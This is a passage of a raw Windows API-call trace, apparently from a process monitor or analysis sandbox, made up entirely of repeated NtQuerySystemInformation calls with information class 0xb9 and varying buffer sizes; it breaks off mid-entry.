[0281.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0281.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0281.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x20, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0281.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd28, Length=0x58, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0281.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0281.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0281.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0281.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0281.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0281.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0281.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0281.782] NtQuerySystemInformation (SystemInformationClass=0xb9, 